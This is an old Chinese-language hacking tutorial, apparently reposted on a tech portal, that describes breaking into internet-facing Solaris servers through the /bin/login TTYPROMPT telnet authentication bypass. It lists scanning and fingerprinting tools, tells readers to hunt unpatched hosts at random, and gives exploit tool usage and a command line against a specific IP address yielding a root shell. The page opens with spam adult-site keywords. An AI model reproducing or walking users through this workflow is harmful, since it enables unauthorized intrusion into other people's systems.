亚洲成精品动漫久久精久,九九在线精品视频播放,黄色成人免费观看,三级成人影院,久碰久,四虎成人欧美精品在永久在线

掃一掃
關注微信公眾號

記一次成功入侵Solaris服務器(sun)
2006-07-11   賽迪網技術社區 

一,入侵準備

最近微軟的漏洞可就多了,所以在網上流傳著各種各樣的入侵Windows的文章,早就聽說了Solaris系統也出來漏洞,決定拿這個要練習一下,隨便熟悉一個這個系統. 在Solaris系統2.6 2.7和2.8的/bin/login存在一個可以通過環境變量TTYPROMPT繞過驗證的漏洞,這個漏洞其實早在2002年10月就發布了,在時間上還算是很新,在網上也應該能找到沒有打補丁的機子,但是如果已經安裝了 “System V系統Login遠程緩沖區溢出漏洞”補丁的系統不受這個漏洞的影響,所以對于這個系統成功率也不是很高.

二,所需工具

1, SCANNER.EXE,這個大家是很熟悉的了,我們這里是用它來尋找網絡上開了23端口telnet服務的主機.

2, 天眼1.0.5.exe,這個是被動式系統識別,域名解析,地理位置查詢,可以用來探測系統的類型.

3, WinPcap_2_3.exe, 由于天眼1.0.5構建在LibPcap之上,故在運行本軟件之前必須安裝Winpcap驅動.

(上述三個工具可以去安全焦點http://www.xfouse.net 下載)

4,sun.exe,紅客聯盟的Lion寫的Win版本的工具程序,可以去http://www.cnhonker.com 下載,解壓后發現有兩個文件,sun.exe和CYGWIN1.DLL,在使用的時候請把兩者放在同一目錄下sun.exe才可使用.

三,工具實例

我們首先要做的就是尋找開了23端口的Solaris主機.雖然這樣的機子在網上也有不少,可是畢竟不想Windows一樣到處都是.

安裝WinPcap_2_3.exe驅動,以便讓天眼能夠工作,安裝完畢就可以打開天眼了,在菜單欄上點擊 “操作”,選擇 “開始”就可以讓它工作了.

然后我們打開SCANNER.EXE,填入我們要掃描的IP地址,在 “掃描選項”的 “端口范圍”寫上23到23,這樣就可以掃描IP段內所有開放23端口的主機了.

等掃描結束以后,我們再看看以前打開的天眼,怎么樣?找到了很多的Solaris主機了吧!(如果沒有發現Solaris主機,那么在SCANNER.EXE另外換一個IP段試一試,應該能找到一些的).

好了,主機已經找到了,接下來就是利用這個漏洞入侵了 ,將下載的sunos-telnet.zip解壓后發現有兩個文件,sun.exe和CYGWIN1.DLL,由于sun.exe需要CYGWIN1.DLL動態數據庫的支持,所以在使用的時候請把兩者放在同一目錄下.

還是讓我們來看看sun.exe的用法,開一個CMD,進入改文件的目錄,在CMD下輸入:

F:HACK>sun.exe

======================

Solaris 5.6 7 8 telnetd Remote exploit

Code by lion, Welcome to HUC website http://www.cnhonker.com

usage: sun [-u user] [-p port] <-h host>

-u: login username (default: bin), try "root"

-p: port to use (default: 23)

看懂了吧!假設我們找到一個IP為202.193.*.80的Solaris主機,那么我們就輸入”

sun.exe –u root –p 23 –h 202.193.*.80

我們也可以直接的輸入:

sun.exe –h 202.193.*.80

這時就使用默認的值,用戶名為bin,端口為23.

現在我們就拿一臺我們剛剛找到的Solaris主機來做測試了,由于攻擊的端口就是23,所以這個-p我們就不要輸入了,在CMD下輸入:

Microsoft Windows XP [版本 5.1.2600]

(C) 版權所有 1985-2001 Microsoft Corp. D:Documents and Settingslinyun>f:

F:>cd hack

F:HACK>sun.exe -u root -h 210.220.131.236

==========================

Solaris 5.6 7 8 telnetd Remote exploite

Code by lion.Welcome to HUC website http://www.cnhonker.com

send to target:

root c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c

c c c c c c c c c c c c c c c c c c c c c c c c c c

當出現了#這個符號的時候,這就說明了我們已經取得了管理員的權限了。

,我們可以看看自己是不是真的取得管理員的權限了,在CMD中輸入who am i就可以看見我們的IP地址了!

注意:如果在攻擊的時候出現connect: Connection refused;connect: Connection aborted; connect: Connection reset by peer這樣的信息,或者等了很久還沒有反應,則表示攻擊失敗了,最大的可能是這臺Slaris不允許root用戶遠程登陸,我們可以用一般的系統用戶bin溢出試一試

熱詞搜索:

上一篇:五招解決Win XP啟動后操作遲延的問題
下一篇:集群掃盲篇:Linux高性能計算集群概述

分享到: 收藏